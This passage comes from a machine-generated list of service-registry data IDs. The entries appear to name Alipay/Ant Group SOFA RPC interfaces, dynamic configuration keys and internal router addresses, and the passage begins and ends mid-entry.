e.service.OperationLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_2320#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iexratecenter.service.facade.api.ExClientSubAgreQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:lifemock@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecommunity.common.service.facade.CommunityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tbx.facade.InstInfoMockService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.SecurityPolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_EC_SG_SERVERLESS_TEST@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.PermLogConfig.logKeyType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.autoinsprod.common.service.facade.AutoInsProdSwitchFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icfmng.common.service.facade.api.BatchPendingVoucherService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_workflow_workflowProblemUpgradeGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agap.service.facade.api.ZCacheService:1.0:gwService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csactive.common.service.facade.api.ComponentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.PolicyUrlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipGrayResource.reconParseEmptyDetailSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireMaxConnectionMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitycap:name=com.alipay.pointprod.common.util.resource.ShadowTestConfigResource.chargeShadowTestSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_F_ICFMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ipsponsorprod.biz.luckyball.service.ConsumeGoldBallService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:oa_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.integration.emcevent.EmcEventDefineFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.cancelaccount.service.ZCBCloseInvokeServiceTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:pushOrderStatusNode@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcdprod.facade.api.FileTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstrategy.common.service.facade.portfolio.PortfolioRedeemServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciaasconnectorcore.facade.conn.StorageConn:1.0:ACOS010002@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.cloudlego.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acprodapicore.facade.service.InvokerAuthServiceFacade:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.alive.api.ALiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.19.30.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.159.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ucdp.venue.UcdpRecallFacade:1.0:reading@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:definfund@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.agds.facade.precheck.GenericBeanPreCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:zhubplus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.framodel.core.service.facade.api.FramodelIndicatorDataFacade:1.0:framodelquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmpservice.common.service.facade.feature.DmpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CallbackService:1.0:xview@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.slaguard.faultinjection.rpcredirector.SlaGuardService:1.0:consumecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databus.common.service.facade.DatabusTransferDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.sdk.change.api.OpscloudQueryService:1.0:lifecycle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.sysparam.SystemParamQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:insuserinsight@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdalhbase:name=com.alipay.zdal.ldc.hbase.mrp.update,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkqafactory.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:test-demo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.tuition.rpc.CustomerOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.core.service.syncdata.UsEastGlobalDataSyncService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexratecenter.service.facade.api.ExStandardProductRateMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.MemberInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:aliinvoiceboss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileic.common.adapter.prod.tel.AliTelProdClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditquery.common.api.PcreditEasyMemberLogFpdccFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.244#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.bp.engine.extension.BPDefineHandler:1.0:fcprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_DOPPLER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.oceanbase.obforumcore.service.common.DealAbnormalKeyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEndWith,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csplatform.service.facade.api.SceneComponentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:custdecisionweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paydecision.service.api.AssetTypeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.api.CloseInvokeService:1.0:insendorseprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.25.144#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insdataprod.common.service.facade.dsb.api.CcUserAbTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.fund.repository.FinTempSumRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.ukey.facade.UkeyEnterpriseManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.dpchangeguardian.common.facade.change.devops.DevOpsChangeApi:1.0:dpchangeguardian@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP-TRADE-BATCH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fintradecenter.common.service.facade.trade.accountgold.CommoditiesOrderOperateShadowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopenscene.facade.supertalk.facade.SuperTalkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smartsql.service.facade.service.TableService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.accreditcore.common.service.facade.CreditAccountQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.177.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:inshealthclaimmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.appext.AopAppPublicExtFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.ops.datasource.insmobile.evaluateAppDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:lifeexprod#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zpaas:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.secondaryBlackListValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.erecon.common.service.facade.query.api.ErcAccItemQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.204.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.dataphin.dpchangeguardian.common.facade.clouddiff.CloudDiffApi:1.0:dpchangeguardian@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:riskperceptcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.finishPayNotRetryErrorCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegeocoding.common.service.facade.district.DistrictProFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:arater@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiscore.common.service.facade.MrchisDicManFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.xxePayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.190.161#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finsupport.common.service.facade.preorder.PreOrderMngQuerySerivce:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ACCORDEREXPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayuarkbase.facade.DayuArkService:1.0:linglongDefault@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.data.FileTemplateCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csassistant.service.facade.api.AssistantTextDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.OperatorRelAccountCzoneQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.249.252#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","sandbox-home-node-ip-test#@#DEFAULT_INSTANCE_ID#@#SANDBOX-HOME","com.alipay.bbcmng.common.service.facade.BbcEventRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.stock.isDiscoveryDowngradeTimelinesCardSort,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbservindustryprod.common.service.facade.reservation.BackendReservationRecordOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instservice.common.service.facade.plugin.PluginQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.spec.SpecExecutor:1.0:core@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mirrormng.facade.api.MirrorScheduleTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:quotoctopus53@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstmng.facade.api.fileoperation.FileOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.alinode:name=com.alipay.routeclient.DefaultRouteCoordinator.stressSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-membertangram-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acpmscore.facade.TransferDeliveryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.217.228#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.omocore.common.service.facade.ContactPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_GUARCORE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finscprod.waitersupport.facade.UserServiceAuthWaiterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.immunemng.facade.inject.facade.ImmInjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.definition.BizObjectOperateOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSKGMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.ryb.drm.RYBParamDrmManager.rybYieldCurveDegradeFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.88.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finquotationcenter.common.service.facade.api.CandlestickHandleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandConditionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fraudmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.PolicyUrlFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.asttshipcore.service.facade.api.query.DailyCutQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbuservice.common.service.ZCacheManagerClientTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitysimulate.common.service.client.antq.AntqMsgConsumer:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.ProtocolConsistService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:abnclprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.133.198#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finance.goldetfprod.common.service.facade.gold.AssetInfoQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcube.common.service.facade.upgrade.UpgradeCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_EC_MOBILE_USER_WIDGET_MSG_EXPIRY_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.charge:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestPreIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_ACCAGOVERNANCE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.ConfigContextManager:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexratecenter.service.facade.api.ExClientRateMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphad.common.service.facade.gfacets.api.IGFacetsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue12#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.edeductcenter.common.service.facade.EdeductMerchantPayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finassetpreference.api.facade.IndexClassifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pfunddts.common.facade.api.TransProductAccountMpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.community.api.wealthscore.WealthScoreInfoManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.RiskmngComplainContentConsultCallBack:1.0:mcommentRisk@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbactivityprod.common.service.facade.ExtSupplementService:1.0:kbservindustryprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilebc.common.service.facade.applepay.api.ApplePayTransactionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gotone.common.service.api.OssFileProcessorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.158.105.158#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:antuxsys@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkUriWithFormated,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pvsofaserver.facade.ZproxyRPvSofaService:1.0:zproxyRForM@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcustsrv.facade.pcbasic.api.PcreditUserInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchprod.common.service.facade.shop.MrchProdShopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.EC_finpwm_capital_send_msg.loadTestEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxcore.common.service.facade.api.attribute.AttributeMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequery.common.service.facade.TradeLogisticsQueryFacade:1.0:tradequeryhis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.financeprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_MWALLETMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.irecon.common.service.query.fund.api.QueryFundApiToTranscodeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipassprod.service.facade.api.AlipassTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecsign.common.service.facade.file.FileManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.core.common.antprocess.BPFlowService:1.0:assetPurchasesQuotationBpFlowService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.common.service.facade.RiskAdviceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mydds.common.service.facade.api.DataDecisionLDCService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.thanks.api.InsThanksEvaluationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_DATABIZ_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:membertangram@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.forumactivity.ForumActivityDetailFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.38.66#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.echox.service.EchoxAopPlaybackService:1.0:ordermng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.mng.SolutionTemplateConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeviceprod.common.service.facade.whitelist.WhiteListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_SETTLE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","a.b:1.0:b@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.admin.MiniAdminOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ecdcc:name=com.alipay.eccommon.monitor.drm.resource.LoggerSwitchControlResource.msgsendOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_S_CLIVECENTERLOW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zcbmarketcenter:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rds.common.service.facade.service.RdsService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetinsight.common.service.facade.api.ProductPoolQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.messagefusion.facade.api.SubscribeUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.158.100.171#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.hadmcore.service.facade.api.CapacityPredictFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insttrade:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.openEOLReplace,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.hostParamCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.alinode:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.accountOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tradequery.common.service.facade.TradeapPayOrderQueryFacade:1.0:tradequeryprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.indonesia.facade.api.IndonesiaLoginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbindustryomp.common.service.facade.api.record.RecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_CREDITUT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.common.service.facade.execute.SearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.common.integration.user.UniQueryServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_programmeApprovalRiskMngSuccessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.definfund.facade.api.DefinfundApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:multiClientTinyAppVersionAuditCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_2320#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.riskmodelcenter.common.service.facade.riskentity.TmpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobilelbs.common.service.facade.ldc.MobilelbsIOTDeviceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:dasaa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.iregulation.common.service.facade.api.irgl.index.CompositeIndexManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_tradeCardClosingProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.UserSecurityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:ceresdbconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkqamng_business_account_apply_process_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@antdsm#@#DEFAULT_INSTANCE_ID